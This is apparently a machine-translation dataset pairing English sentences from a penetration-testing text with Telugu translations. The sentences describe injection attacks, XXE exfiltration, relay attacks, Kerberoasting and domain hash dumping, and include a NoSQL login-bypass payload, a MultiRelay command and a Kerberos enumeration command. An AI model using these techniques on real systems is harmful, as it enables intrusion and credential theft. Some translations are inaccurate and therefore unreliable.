| {"en":"A great way to demonstrate XSS impact with social engineering tactics is by pushing malware to their machine via a Flash Update prompt.","translation":"సామాజిక ఇంజనీరింగ్ వ్యూహాలతో XSS ప్రభావాన్ని ప్రదర్శించడానికి ఒక గొప్ప మార్గం ఏమిటంటే, ఫ్లాష్ అప్డేట్ ప్రాంప్ట్ ద్వారా వారి మెషీన్కు మాల్వేర్ను నెట్టడం.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"We will discuss this in the XSS to Compromise section.","translation":"మేము దీన్ని XSS నుండి రాజీ విభాగంలో చర్చిస్తాము.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Let's see this in action: Go to http://chat:3000/nosql2","translation":"దీనిని ఎలా చేయాలో చూద్దాం: http://chat:3000/nosql2కి వెళ్ళండి.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"You should be logged in with admin!","translation":"మీరు నిర్వాహకుడిగా లాగిన్ అవ్వాలి!","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"What if you didn't know which usernames to attack?","translation":"మీరు ఏ వినియోగదారు పేర్లను లక్ష్యంగా చేసుకోవాలో మీకు తెలియకపోతే ఏమిటి?","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"In this case, the NoSQLi POST request would look something like: username[$gt]=admin&password[$gt]=&submit=login","translation":"ఈ సందర్భంలో, NoSQLi POST అభ్యర్థన ఇలా ఉంటుంది: username[$gt]=admin&password[$gt]=&submit=login","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Continue doing this until you find the superaccount.","translation":"మీరు సూపర్ ఖాతాను కనుగొనే వరకు దీన్ని కొనసాగించండి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"So what's the big deal with deserialization attacks?","translation":"అయితే డీసెరియలైజేషన్ దాడులతో పెద్ద ఒప్పందం ఏమిటి?","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's walk through the details of an attack to better understand what is happening.","translation":"ఏమి జరుగుతుందో బాగా అర్థం చేసుకోవడానికి దాడి వివరాలను పరిశీలిద్దాం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Generally, allowing user input to go into a JavaScript eval statement is bad news, as eval() executes raw JavaScript.","translation":"సాధారణంగా, వినియోగదారు ఇన్పుట్ను జావాస్క్రిప్ట్ ఎవల్ స్టేట్మెంట్లోకి అనుమతించడం చెడు వార్త, ఎందుకంటే eval() ముడి జావాస్క్రిప్ట్ను అమలు చేస్తుంది.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"If an attacker is able to inject JavaScript into this statement, they would be able to have Remote Code Execution onto the server.","translation":"ఒక దుండగుడు ఈ ప్రకటనలోకి జావాస్క్రిప్ట్ను ఇంజెక్ట్ చేయగలిగితే, వారు సర్వర్పై రిమోట్ కోడ్ ఎగ్జిక్యూషన్ను కలిగి ఉండగలరు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Let's walk through each of the requirements to perform template injection:","translation":"టెంప్లేట్ ఇంజెక్షన్ చేయడానికి అవసరమైన వాటిని ఒక్కొక్కటిగా చూద్దాం:","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"First, we need to trigger a new line and break out of the current template.","translation":"ముందుగా, మనం ఒక కొత్త లైన్ను ట్రిగ్గర్ చేయాలి మరియు ప్రస్తుత టెంప్లేట్ నుండి బయటకు రావాలి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"You have identified template injection in the user parameter!","translation":"మీరు వినియోగదారు పరామితిలో టెంప్లేట్ ఇంజెక్షన్ను గుర్తించారు!","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's get remote code execution by abusing JavaScript.","translation":"జావాస్క్రిప్ట్ను దుర్వినియోగం చేయడం ద్వారా రిమోట్ కోడ్ ఎగ్జిక్యూషన్ను పొందుదాం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We can now set this to import a 'child_process' with .exec to obtain RCE:","translation":"ఇప్పుడు మనం RCEని పొందడానికి .execతో 'child_process'ని దిగుమతి చేయడానికి దీన్ని సెట్ చేయవచ్చు:","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Remote code execution is what we look for in every assessment and web application penetration test.","translation":"ప్రతి మూల్యాంకనం మరియు వెబ్ అప్లికేషన్ చొచ్చుకుపోయే పరీక్షలో మేము రిమోట్ కోడ్ ఎగ్జిక్యూషన్ను చూస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"In our lab, we are going to perform an upload RCE on a Node application.","translation":"మా ల్యాబ్లో, మేము నోడ్ అప్లికేషన్లో అప్లోడ్ RCEని నిర్వహించబోతున్నాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Since we know the underlying application is Node (JavaScript), what kind of payload could we upload to be executed by Pug?","translation":"అంతర్లీన అప్లికేషన్ నోడ్ (జావాస్క్రిప్ట్) అని మనకు తెలిసినందున, పగ్ ద్వారా అమలు చేయడానికి మనం ఎలాంటి పేలోడ్ను అప్లోడ్ చేయవచ్చు?","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Server Side Request Forgery (SSRF) is one of those vulnerabilities that I feel is generally misunderstood.","translation":"సర్వర్ సైడ్ రిక్వెస్ట్ ఫోర్జరీ (SSRF) అనేది నేను సాధారణంగా తప్పుగా అర్థం చేసుకున్న దుర్బలత్వాలలో ఒకటి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's say you have a public web application that allows users to upload a profile image by URL from the Internet.","translation":"ఇంటర్నెట్ నుండి URL ద్వారా ప్రొఫైల్ చిత్రాన్ని అప్లోడ్ చేయడానికి వినియోగదారులను అనుమతించే పబ్లిక్ వెబ్ అప్లికేషన్ మీకు ఉందని అనుకుందాం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Server Side Request Forgery can be extremely dangerous.","translation":"సర్వర్ సైడ్ రిక్వెస్ట్ ఫోర్జరీ చాలా ప్రమాదకరంగా ఉంటుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Intercept traffic and hit \"Hack the XML\".","translation":"ట్రాఫిక్ను అడ్డుకోండి మరియు \"హాక్ ది XML\" నొక్కండి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"In this example, we specified that it is XML version 1.0, DOCTYPE, specified the root element is thp, !ELEMENT specifies ANY type, and !ENTITY sets the book to the string \"Universe\".","translation":"ఈ ఉదాహరణలో, ఇది XML వెర్షన్ 1.0 అని, DOCTYPE అని, రూట్ ఎలిమెంట్ thp అని, !ELEMENT ఏదైనా రకాన్ని పేర్కొంటుందని మరియు !ENTITY పుస్తకాన్ని \"Universe\" స్ట్రింగ్కు సెట్ చేస్తుందని మేము పేర్కొన్నాము.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Since we control the POST data that has the XML request, we can try to inject our own malicious entities.","translation":"XML అభ్యర్థనను కలిగి ఉన్న POST డేటాను మేము నియంత్రిస్తున్నందున, మేము మా స్వంత హానికరమైన ఎంటిటీలను ఇంజెక్ట్ చేయడానికి ప్రయత్నించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"By default, most XML parsing libraries support the SYSTEM keyword that allows data to be read from a URI.","translation":"డిఫాల్ట్గా, చాలా XML పార్సింగ్ లైబ్రరీలు SYSTEM కీవర్డ్కు మద్దతు ఇస్తాయి, ఇది URI నుండి డేటాను చదవడానికి అనుమతిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We will need to percent encode the ampersand and semicolon character.","translation":"మేము యాంప్సండ్ మరియు సెమీకోలన్ అక్షరాన్ని శాతం ఎన్కోడ్ చేయాలి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Instead of defining our attack in the request payload, we can supply a remote Document Type Definition (DTD) file to perform an OOB-XXE.","translation":"అభ్యర్థన పేలోడ్లో మా దాడిని నిర్వచించే బదులు, మేము OOB-XXEని నిర్వహించడానికి రిమోట్ డాక్యుమెంట్ టైప్ డెఫినిషన్ (DTD) ఫైల్ను అందించవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"A DTD is a well-structured XML file that defines the structure and the legal elements and attributes of an XML document.","translation":"DTD అనేది బాగా నిర్మాణాత్మకమైన XML ఫైల్, ఇది XML డాక్యుమెంట్ యొక్క నిర్మాణం మరియు చట్టపరమైన మూలకాలు మరియు లక్షణాలను నిర్వచిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"In our lab example, we are going to cause the vulnerable XXE server to request a DTD hosted on a remote server.","translation":"మా ల్యాబ్ ఉదాహరణలో, మేము రిమోట్ సర్వర్లో హోస్ట్ చేయబడిన DTDని అభ్యర్థించడానికి హాని కలిగించే XXE సర్వర్ను కారణం చేయబోతున్నాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The DTD file you just created instructs the vulnerable server to read /etc/passwd and then try to make a web request with our sensitive data back to our attacker machine.","translation":"మీరు ఇప్పుడే సృష్టించిన DTD ఫైల్ హాని కలిగించే సర్వర్ను /etc/passwdని చదవమని మరియు తరువాత మా సున్నితమైన డేటాతో మా అటాకర్ మెషిన్కు వెబ్ అభ్యర్థన చేయడానికి ప్రయత్నించమని నిర్దేశిస్తుంది.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"When doing XXE attacks, it is common to run into parser errors.","translation":"XXE దాడులు చేస్తున్నప్పుడు, పార్సర్ లోపాలను ఎదుర్కోవడం సాధారణం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"In the case with PHP, we can use PHP input/output streams to read local files and base64 encode them.","translation":"PHP విషయంలో, మేము స్థానిక ఫైల్లను చదవడానికి మరియు వాటిని base64 ఎన్కోడ్ చేయడానికి PHP ఇన్పుట్/అవుట్పుట్ స్ట్రీమ్లను ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"On day two of your assessment, you ran nmap on the whole network.","translation":"మీ అంచనా యొక్క రెండవ రోజున, మీరు మొత్తం నెట్వర్క్లో nmapని అమలు చేశారు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"In this chapter, you will be concentrating on Red Team tactics, abusing the corporate infrastructure, getting credentials, learning about the internal network, and pivoting between hosts and networks.","translation":"ఈ అధ్యాయంలో, మీరు రెడ్ టీమ్ వ్యూహాలపై, కార్పొరేట్ మౌలిక సదుపాయాలను దుర్వినియోగం చేయడం, ఆధారాలను పొందడం, అంతర్గత నెట్వర్క్ గురించి తెలుసుకోవడం మరియు హోస్ట్లు మరియు నెట్వర్క్ల మధ్య తిరగడంపై దృష్టి పెడతారు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"As a Red Teamer, finding the initial entry point can be complex and will require plenty of resources.","translation":"రెడ్ టీమర్గా, ప్రారంభ ఎంట్రీ పాయింట్ను కనుగొనడం సంక్లిష్టంగా ఉంటుంది మరియు చాలా వనరులు అవసరం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Sometimes, I tell my Red Teams to just . . . keep it simple.","translation":"కొన్నిసార్లు, నేను నా రెడ్ టీమ్లకు . . . సరళంగా ఉంచమని చెబుతాను.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"One of the most basic techniques that has been around is password bruteforcing.","translation":"అత్యంత ప్రాథమిక పద్ధతుల్లో ఒకటి పాస్వర్డ్ బ్రూట్ఫోర్సింగ్.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"These are the targets we want to go after.","translation":"మేము లక్ష్యంగా చేసుకోవాలనుకుంటున్నవి ఇవే.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"We are going to target all the different applications and try to guess basic passwords as we’ve seen this in real world APT style campaigns.","translation":"మేము అన్ని విభిన్న అప్లికేషన్లను లక్ష్యంగా చేసుకుంటాము మరియు వాస్తవ ప్రపంచ APT శైలి ప్రచారాల్లో మేము చూసిన విధంగా ప్రాథమిక పాస్వర్డ్లను ఊహించడానికి ప్రయత్నిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Password reuse is very high.","translation":"పాస్వర్డ్ పునర్వినియోగం చాలా ఎక్కువ.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Remember, it only takes one password to get our foot in the door!","translation":"గుర్తుంచుకోండి, మనల్ని లోపలికి తీసుకువెళ్లడానికి ఒక పాస్వర్డ్ మాత్రమే సరిపోతుంది!","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Terminal Window /opt/Responder/tools ./MultiRelay.py -t <target host> -c <shell command> -u ALL","translation":"టెర్మినల్ విండో /opt/Responder/tools ./MultiRelay.py -t <లక్ష్య హోస్ట్> -c <షెల్ కమాండ్> -u ALL","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Once the Relay to a victim host is achievable, we need to think about what we want to execute on our victim workstation.","translation":"ఒకసారి బాధితుడి హోస్ట్కు రిలే సాధించగలిగితే, మన బాధితుడి వర్క్స్టేషన్లో మనం ఏమి అమలు చేయాలనుకుంటున్నామో ఆలోచించాలి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"By default, MultiRelay can spawn a basic shell, but we can also automatically execute Meterpreter PowerShell payloads, Empire PowerShell payloads, our dnscat2 PowerShell payload, PowerShell Scripts to Download and Execute C2 agents, Mimikatz, or just run calc.exe for kicks.","translation":"డిఫాల్ట్గా, MultiRelay ఒక ప్రాథమిక షెల్ను ప్రారంభించగలదు, కానీ మేము మీటర్ప్రెటర్ పవర్షెల్ పేలోడ్లు, ఎంపైర్ పవర్షెల్ పేలోడ్లు, మా dnscat2 పవర్షెల్ పేలోడ్, C2 ఏజెంట్లను డౌన్లోడ్ చేయడానికి మరియు అమలు చేయడానికి పవర్షెల్ స్క్రిప్ట్లు, మిమికాట్జ్ లేదా కేవలం calc.exe ని కూడా అమలు చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"References http://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay- them/ PowerShell Responder","translation":"సూచనలు http://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay- them/ పవర్షెల్ రెస్పాండర్","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Once we compromise a Windows system, we can use PowerShell off our victim to do Responder style attacks.","translation":"ఒకసారి మేము విండోస్ సిస్టమ్ను రాజీ పడితే, రెస్పాండర్ స్టైల్ దాడులను చేయడానికి మేము మా బాధితుడి నుండి పవర్షెల్ను ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Both features of the original Responder can be performed through the following two tools:","translation":"అసలు రెస్పాండర్ యొక్క రెండు ఫీచర్లను కింది రెండు సాధనాల ద్వారా నిర్వహించవచ్చు:","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Inveigh - https://github.com/Kevin- Robertson/Inveigh/blob/master/Scripts/Inveigh.ps1","translation":"ఇన్వెయి - https://github.com/Kevin- Robertson/Inveigh/blob/master/Scripts/Inveigh.ps1","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Inveigh-Relay","translation":"ఇన్వెయి-రిలే","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"To make things even easier, all this is already built into Empire.","translation":"విషయాలను మరింత సులభతరం చేయడానికి, ఇదంతా ఇప్పటికే ఎంపైర్లో నిర్మించబడింది.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"User Enumeration Without Credentials","translation":"గుర్తింపు ధృవీకరణ లేకుండా వినియోగదారుల జాబితా","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Once on the network, we might be able to use Responder to get credentials or shells, but there are also times when both SMB signing is enabled and cracking NTLMv2 SSP isn't viable.","translation":"నెట్వర్క్లో ఉన్న తర్వాత, ఆధారాలను లేదా షెల్లను పొందడానికి మేము రెస్పాండర్ను ఉపయోగించవచ్చు, కానీ SMB సంతకం ప్రారంభించబడినప్పుడు మరియు NTLMv2 SSPని క్రూరంగా చేయడం సాధ్యం కానప్పుడు కూడా సమయాలు ఉన్నాయి.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"That is when we take a step back and start with the basics.","translation":"అప్పుడు మనం ఒక అడుగు వెనక్కి వేసి, ప్రాథమిక అంశాలతో ప్రారంభిస్తాము.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Without actively scanning the network yet, we need to get a list of users (could be for password spraying or even social engineering).","translation":"ఇంకా నెట్వర్క్ను చురుకుగా స్కాన్ చేయకుండా, మనం వినియోగదారుల జాబితాను పొందాలి (ఇది పాస్వర్డ్ స్ప్రేయింగ్ లేదా సోషల్ ఇంజనీరింగ్ కోసం కావచ్చు).","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"One option is to start enumerating users against the Domain Controller.","translation":"ఒక ఎంపిక ఏమిటంటే డొమైన్ కంట్రోలర్కు వ్యతిరేకంగా వినియోగదారులను లెక్కించడం ప్రారంభించడం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Historically (back in the 2003 era), we could try to perform RID cycling to get a list of all user accounts.","translation":"చారిత్రాత్మకంగా (2003 యుగంలో), మేము అన్ని వినియోగదారు ఖాతాల జాబితాను పొందడానికి RID సైక్లింగ్ను ప్రయత్నించవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Although this is no longer available, there are other options to bruteforce accounts.","translation":"ఇది ఇకపై అందుబాటులో లేనప్పటికీ, ఖాతాలను బ్రూట్ఫోర్స్ చేయడానికి ఇతర ఎంపికలు ఉన్నాయి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"One option is to abuse Kerberos: nmap -p88 --script krb5-enum-users --script-args krb5-enum- users.realm=\"cyberspacekittens.local\",userdb=/opt/userlist.txt <Domain Controller IP>","translation":"ఒక ఎంపిక కెర్బెరోస్ను దుర్వినియోగం చేయడం: nmap -p88 --script krb5-enum-users --script-args krb5-enum- users.realm=\"cyberspacekittens.local\",userdb=/opt/userlist.txt <డొమైన్ కంట్రోలర్ IP>","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"We will need to supply a list of usernames to test, but since we are only querying the DC and not authenticating it, this activity is generally not detected.","translation":"మేము పరీక్షించడానికి వినియోగదారుపేర్ల జాబితాను అందించాలి, కానీ మేము DCని మాత్రమే ప్రశ్నిస్తున్నాము మరియు దాన్ని ప్రమాణీకరించడం లేదు కాబట్టి, ఈ కార్యాచరణ సాధారణంగా గుర్తించబడదు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Now, we can take these user accounts and start password spraying again!","translation":"ఇప్పుడు, మేము ఈ వినియోగదారు ఖాతాలను తీసుకొని మళ్ళీ పాస్వర్డ్ స్ప్రేయింగ్ ప్రారంభించవచ్చు!","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Scanning the Network with CrackMapExec (CME)","translation":"CrackMapExec (CME)తో నెట్వర్క్ను స్కాన్ చేయడం","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"PowerShell tool to gain network situational awareness on Windows domains.","translation":"విండోస్ డొమైన్లపై నెట్వర్క్ పరిస్థితిని తెలుసుకోవడానికి పవర్షెల్ సాధనం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"As an attacker, we can leverage PowerView and PowerShell to query AD.","translation":"ఒక దాడి చేసే వ్యక్తిగా, మేము ADని ప్రశ్నించడానికి PowerView మరియు PowerShellని ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's walk through an example of how much data we can get with this low-level user.","translation":"ఈ తక్కువ-స్థాయి వినియోగదారుతో మనం ఎంత డేటాను పొందగలమో ఒక ఉదాహరణ చూద్దాం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Once we have our agent communicating with our Command and Control server, we can type \"info\" to find out information about our victim.","translation":"ఒకసారి మా ఏజెంట్ మా కమాండ్ మరియు కంట్రోల్ సర్వర్తో కమ్యూనికేట్ చేసిన తర్వాత, మేము మా బాధితుడి గురించి సమాచారాన్ని తెలుసుకోవడానికి \"info\" అని టైప్ చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"PowerView queries the Domain Controller (DC) to get information on users, groups, computers, and more.","translation":"వినియోగదారులు, సమూహాలు, కంప్యూటర్లు మరియు మరిన్నింటి గురించి సమాచారం పొందడానికి పవర్వ్యూ డొమైన్ కంట్రోలర్ (DC)ని ప్రశ్నిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The PowerView features that we will be using will only query the Domain Controller and should look like normal traffic.","translation":"మేము ఉపయోగించబోయే పవర్వ్యూ ఫీచర్లు డొమైన్ కంట్రోలర్ను మాత్రమే ప్రశ్నిస్తాయి మరియు సాధారణ ట్రాఫిక్లా కనిపిస్తాయి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We can start with the PowerView script called get_user.","translation":"get_user అనే పవర్వ్యూ స్క్రిప్ట్తో మనం ప్రారంభించవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Get_user queries information for a given user or users in the specified domain.","translation":"నిర్దిష్ట డొమైన్లో ఇచ్చిన వినియోగదారు లేదా వినియోగదారుల కోసం get_user సమాచారాన్ని ప్రశ్నిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"By using the default settings, we can get a dump of all information about users in AD and associated information.","translation":"డిఫాల్ట్ సెట్టింగ్లను ఉపయోగించడం ద్వారా, మేము ADలోని వినియోగదారుల గురించిన మొత్తం సమాచారం మరియు అనుబంధిత సమాచారం యొక్క డంప్ను పొందవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We can see their samaccountname or username, when their password was changed, what their object category is, what membersof they are part of, last login, and more.","translation":"వారి samaccountname లేదా వినియోగదారు పేరు, వారి పాస్వర్డ్ ఎప్పుడు మార్చబడింది, వారి వస్తువు వర్గం ఏమిటి, వారు దేనిలో సభ్యులుగా ఉన్నారు, చివరి లాగిన్ మరియు మరిన్నింటిని మనం చూడవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"What other type of information can we get?","translation":"మనం మరే ఇతర రకమైన సమాచారాన్ని పొందవచ్చు?","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Get_group_member returns the members of a given group, with the option to \"Recurse\" to find all effective group members.","translation":"Get_group_member ఇచ్చిన సమూహం యొక్క సభ్యులను తిరిగి ఇస్తుంది, అన్ని ప్రభావవంతమైన సమూహ సభ్యులను కనుగొనడానికి \"Recurse\" ఎంపికతో.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We can use AD to find specific users of certain groups.","translation":"నిర్దిష్ట సమూహాలలోని నిర్దిష్ట వినియోగదారులను కనుగొనడానికి మేము ADని ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Now, we have a list of users, groups, servers and services.","translation":"ఇప్పుడు, మేము వినియోగదారులు, సమూహాలు, సర్వర్లు మరియు సేవల జాబితాను కలిగి ఉన్నాము.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"This will help us map which users have which privileges.","translation":"ఏ వినియోగదారులకు ఏ అధికారాలు ఉన్నాయో మ్యాప్ చేయడానికి ఇది మాకు సహాయపడుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"However, we still need detailed information about workstations and systems.","translation":"అయితే, మనకు వర్క్స్టేషన్లు మరియు సిస్టమ్ల గురించి వివరణాత్మక సమాచారం ఇంకా అవసరం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We can get this information on a module called get_computer.","translation":"get_computer అనే మాడ్యూల్లో మేము ఈ సమాచారాన్ని పొందవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Well, we see that we gained information about the machine, when it was created, DNS hostnames, the distinguished names, and more.","translation":"సరే, మేము మెషిన్ గురించి, అది ఎప్పుడు సృష్టించబడిందో, DNS హోస్ట్పేర్లు, విశిష్ట పేర్లు మరియు మరిన్నింటి గురించి సమాచారాన్ని పొందామని మేము చూస్తాము.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"As an attacker, one of the most helpful recon details is obtaining operating system types and operating system versions.","translation":"ఒక దాడి చేసే వ్యక్తిగా, అత్యంత సహాయకరమైన పునరుద్ధరణ వివరాలలో ఒకటి ఆపరేటింగ్ సిస్టమ్ రకాలు మరియు ఆపరేటింగ్ సిస్టమ్ వెర్షన్లను పొందడం.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Bloodhound works by running an Ingestor on a victim system, and then queries AD (similar to what we previously did manually) for users, groups, and hosts.","translation":"బ్లడ్హౌండ్ బాధితుడి సిస్టమ్లో ఇన్జెస్టర్ను అమలు చేయడం ద్వారా పనిచేస్తుంది, ఆపై వినియోగదారులు, సమూహాలు మరియు హోస్ట్ల కోసం ADని ప్రశ్నిస్తుంది (ముందుగా మనం మాన్యువల్గా చేసిన విధంగానే).","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Since any ticket can be requested by any user, this means that, if we can guess the password to the associated service user’s NTLM hash (that encrypted the ticket), then we now know the password to the actual service account.","translation":"ఏదైనా టికెట్ను ఏ వినియోగదారుడైనా అభ్యర్థించవచ్చు కాబట్టి, అనుబంధిత సేవా వినియోగదారుని NTLM హ్యాష్కు సంబంధించిన పాస్వర్డ్ను మేము ఊహించగలిగితే (టికెట్ను ఎన్క్రిప్ట్ చేసినది), అప్పుడు మేము అసలు సేవా ఖాతాకు సంబంధించిన పాస్వర్డ్ను తెలుసుకుంటాము.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"We can either target a single user SPN or pull all the user Kerberos tickets into our user's memory.","translation":"మేము ఒకే వినియోగదారు SPNని లక్ష్యంగా చేసుకోవచ్చు లేదా వినియోగదారులందరి కెర్బెరోస్ టిక్కెట్లను మా వినియోగదారు మెమరీలోకి లాగవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"If successful, we have imported either one or many different Kerberos tickets into our victim computer's memory.","translation":"విజయవంతమైతే, మేము ఒకటి లేదా అనేక విభిన్న కెర్బెరోస్ టిక్కెట్లను మా బాధితుడి కంప్యూటర్ మెమరీలోకి దిగుమతి చేసుకున్నాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Remember that the tickets are encrypted with the service account's NTLM hash.","translation":"టిక్కెట్లు సేవా ఖాతా యొక్క NTLM హ్యాష్తో ఎన్క్రిప్ట్ చేయబడ్డాయని గుర్తుంచుకోండి.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"The easiest way to crack accounts is using a tool called tgsrepcrack.","translation":"ఖాతాలను క్రమబద్ధీకరించడానికి సులభమైన మార్గం tgsrepcrack అనే సాధనాన్ని ఉపయోగించడం.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"You can output the results in John the Ripper or even Hashcat formats to crack the passwords.","translation":"పాస్వర్డ్లను క్రమబద్ధీకరించడానికి మీరు ఫలితాలను జాన్ ది రిప్పర్ లేదా హ్యాష్క్యాట్ ఫార్మాట్లలో అవుట్పుట్ చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Once we have obtained Domain Administrative access, the old way to pull all the hashes from the DC was to run commands on the domain controller and use Shadow Volume or Raw copy techniques to pull off the Ntds.dit file.","translation":"డొమైన్ అడ్మినిస్ట్రేటివ్ యాక్సెస్ను పొందిన తర్వాత, DC నుండి అన్ని హ్యాష్లను లాగడానికి పాత మార్గం ఏమిటంటే, డొమైన్ కంట్రోలర్లో ఆదేశాలను అమలు చేయడం మరియు Ntds.dit ఫైల్ను తీసివేయడానికి షాడో వాల్యూమ్ లేదా రా కాపీ పద్ధతులను ఉపయోగించడం.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Luckily for us, we can take advantage of a Windows feature called Volume Shadow Copy Service (VSS), which will create a snapshot copy of the volume.","translation":"అదృష్టవశాత్తూ, వాల్యూమ్ యొక్క స్నాప్షాట్ కాపీని సృష్టించే వాల్యూమ్ షాడో కాపీ సర్వీస్ (VSS) అనే విండోస్ ఫీచర్ను మేము ఉపయోగించుకోవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We can then read the Ntds.dit file from that copy and pull it off the machine.","translation":"అప్పుడు మేము ఆ కాపీ నుండి Ntds.dit ఫైల్ను చదవవచ్చు మరియు దానిని మెషిన్ నుండి తీసివేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"NinjaCopy is another tool that, once on the Domain Controller, can be used to grab the Ntds.dit file.","translation":"నింజాకాపీ అనేది మరొక సాధనం, ఇది డొమైన్ కంట్రోలర్లో ఉన్న తర్వాత, Ntds.dit ఫైల్ను పొందడానికి ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The concept of DCSync is that it impersonates a Domain Controller to request all the hashes of the users in that Domain.","translation":"DCSync యొక్క భావన ఏమిటంటే, ఆ డొమైన్లోని వినియోగదారులందరి హ్యాష్లను అభ్యర్థించడానికి ఇది డొమైన్ కంట్రోలర్ను అనుకరిస్తుంది.","target_lang":"te","domain":"technical","complexity":"complex"} | |
